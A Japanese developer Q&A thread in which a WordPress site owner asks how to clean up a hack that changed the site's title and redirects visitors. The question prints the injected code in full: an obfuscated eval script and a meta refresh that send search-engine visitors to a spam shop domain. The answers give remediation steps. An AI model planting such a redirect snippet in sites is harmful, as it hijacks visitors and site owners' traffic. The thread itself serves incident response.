質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

質問する

ただいまの
回答率

88.10%

WordPressを使用したサイトのタイトルが書き換えられ、別ページに飛ばされる。

解決済

回答 3

投稿

  • 評価
  • クリップ 1
  • VIEW 2,090
退会済みユーザー

退会済みユーザー

お世話になります。
あるwordpressを使用したサイトがタイトルが変わっており、リンクをクリックすると、別ページにとばされるようになっていました。
コードをみてみると、

<!DOCTYPE html><html><head><meta charset="utf-8"><title>【正規品・送料無料】ファンケル ハイグレードビタミン(120粒×3袋)+ラブコンパクトセット,ブランドコスメサプリメント 【商品総額5400円↑で送料無料!(北海道・離島除く)】</title></head><body><script>eval(('if'+'('+'/(go'+'ogle'+'|ya'+'ho'+'o|b'+'ing'+'|a'+'o'+'l)/i.'+'test'+'(d'+'oc'+'um'+'e'+'nt.re'+'fer'+'rer)'+')'+'{wind'+'ow.se'+'tTi'+'m'+'e'+'out('+'fun'+'c'+'ti'+'on'+'(){t'+'op.l'+'ocat'+'i'+'on.'+'h'+'re'+'f="h'+'ttp:'+'/'+'/ww'+'w'+'.fLy'+'s'+'aLe.p'+'w/i'+'ndex'+'.ph'+'p?'+'mai'+'n_'+'page='+'prod'+'uct'+'_'+'info&'+'prod'+'ucts_'+'id=3'+'3109'+'"},10'+'00'+')}').replace(/####/g, '\''))</script><noscript><meta http-equiv="refresh" content="1; url=http://www.fLysaLe.pw/index.php?main_page=product_info&products_id=33109" /></noscript></body></html>

のように書かれていました。
もちろん運営者はこれをかいてないので、ハッキングされたのだと思うのですが、
どこを修正したらよいのか検討がつきません、
テーマファイルにはこのような記述はないようでした。
どの辺りをさがしてみるのがよいでしょうか?
皆様のお知恵をお借りできたらと思います。
どうぞよろしくお願い致します。

  • 気になる質問をクリップする

    クリップした質問は、後からいつでもマイページで確認できます。

    またクリップした質問に回答があった際、通知やメールを受け取ることができます。

    クリップを取り消します

  • 良い質問の評価を上げる

    以下のような質問は評価を上げましょう

    • 質問内容が明確
    • 自分も答えを知りたい
    • 質問者以外のユーザにも役立つ

    評価が高い質問は、TOPページの「注目」タブのフィードに表示されやすくなります。

    質問の評価を上げたことを取り消します

  • 評価を下げられる数の上限に達しました

    評価を下げることができません

    • 1日5回まで評価を下げられます
    • 1日に1ユーザに対して2回まで評価を下げられます

    質問の評価を下げる

    teratailでは下記のような質問を「具体的に困っていることがない質問」、「サイトポリシーに違反する質問」と定義し、推奨していません。

    • プログラミングに関係のない質問
    • やってほしいことだけを記載した丸投げの質問
    • 問題・課題が含まれていない質問
    • 意図的に内容が抹消された質問
    • 過去に投稿した質問と同じ内容の質問
    • 広告と受け取られるような投稿

    評価が下がると、TOPページの「アクティブ」「注目」タブのフィードに表示されにくくなります。

    質問の評価を下げたことを取り消します

    この機能は開放されていません

    評価を下げる条件を満たしてません

    評価を下げる理由を選択してください

    詳細な説明はこちら

    上記に当てはまらず、質問内容が明確になっていない質問には「情報の追加・修正依頼」機能からコメントをしてください。

    質問の評価を下げる機能の利用条件

    この機能を利用するためには、以下の事項を行う必要があります。

回答 3

checkベストアンサー

+4

bodyタグの中にscriptでページロード後、1秒後に別サイトへリンク(←注アクセスしないでください)
というコードが書き込まれていますね…。これは悪意のあるコードです。

function.phpに見知らぬコードが増えていたり、テーマファイル内に見知らぬファイルは増えていませんでしょうか?
たった一行、十数文字のコードで上記のコードを埋め込むことも可能です。(実際にそういったケースを見たこともあります)
そのWordPressのテーマは自作されたものでしょうか?それともどこかでダウンロードされたものでしょうか?

・ダウンロードしてきたものの場合
もし、WordPress公式以外のテーマであった場合、即時使用を中止してください。
非公式の(無料のものは特に)テーマには、最初から悪意のあるコードが加えられていることも少なくありません。
中には同ディレクトリ内のすべてのテーマファイルを汚染するものもあります。
他のテーマも改竄や見知らぬファイルが増えていないかチェックしてください。

以後、自作の場合と同様の対処を。

・自作の場合

  1. クラックされています。他の回答者さまもおっしゃっているよう、一旦公開を中止
  2. サーバーのログを確認し、不審なリクエストが無いか確認
  3. サーバー内に見知らぬファイルが無いかチェック
  4. 使用しているファイルの中に改竄が無いかチェック

したうえで
もし2でサーバー内部に侵入されていた場合は、パスワードを変更したうえでバックドアなどが仕掛けられていないか、もチェックしなければならないので、サーバー運営会社や専門の方にお願いするのが良いでしょう。

ログのチェックで

  • サーバーのログインが破られたのか
  • FTPアカウントが漏れているのか
  • WordPressの管理画面が破られたのか
  • あるいは実は拾ってきたもののせいなのか(テーマやプラグインが原因)

が分かると思います。
どのレベルかによって、重篤さと対処が変わってくるので、まずはここがどのレベルのものかをチェックされてみてください。

ストレージ側の処理はどの道借りている側で行わなければならないと思うので

  • ファイルパーミッションをチェック→必要があれば変更
  • 不審なファイルは削除
  • WordPressのコアファイルをクリーンインストール
  • テーマファイルを(取ってあれば)バックアップから復帰、なければ修正or新たに作成したほうが無難かと。
  • データベースのチェック(データベースに悪意あるコードを書き込まれているケースもあります→その場合バックアップから復旧)
  • サイトスキャンを使って診断(Goole Webマスターツールなどにもあります。
    )※これは気休め程度ですが

注:サイトスキャンは確実に脅威を検出できる類のものではないので
見落としが無いか、の簡易的な確認くらいの意味合いしかありません。

投稿

編集

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2016/04/12 13:09

    ご回答ありがとうございます。
    テーマは自作のものになります。公開を停止し、別サーバーで最新WPで構築しドメインの向き先を変更しました。詳しくご回答頂きありがとうございます。ベストアンサーにさせていただきました。また、なにかありましたらご回答へのご協力どうぞよろしくお願い致します。

    キャンセル

  • 2016/04/16 23:42

    お返事が遅くなってしまいました、自作でしたか。ということは何かしらの方法で注入されたのですね…。ログ解析の結果はいかがだったでしょう?
    はい、もちろんです。何かありました際は可能な限り協力させていただきます。

    キャンセル

+1

修正する前に FTPのパスワードなどを一通り変更することをお勧めします。
また、ログなどを見て 何が原因かを探るべきです。

マルウェアが埋め込まれていた場合は 閲覧者が被害にあいます。

投稿

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2016/04/12 13:03

    ご回答ありがとうございます。
    パスワードなど変更させていただきました。

    キャンセル

+1

WordPress Codex - FAQ/ハッキング・クラッキング被害

サーバに何をされているかわからなければ、すぐに公開を取りやめましょう。
私なら別でサーバを立て、そちらにDNSを向け変え、今のサーバは、その後でじっくり原因究明ですかね。。。
再度狙われる可能性もあるので、新サーバも安心ではありませんが、最新のWPで構築しなおしておけば、脅威度はかなり落ちると思います。

投稿

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2016/04/12 13:05

    ご回答ありがとうございます。
    そのように対応いたしました。原因究明はこれからですが、新しくしたもののセキュリティを高めることが優先になりそうです。

    キャンセル

15分調べてもわからないことは、teratailで質問しよう!

  • ただいまの回答率 88.10%
  • 質問をまとめることで、思考を整理して素早く解決
  • テンプレート機能で、簡単に質問をまとめられる
質問する

関連した質問

同じタグがついた質問を見る

SNSアカウントでログイン

teratailアカウントでログイン

思考するエンジニアのためのQ&Aサイト「teratail」について詳しく知る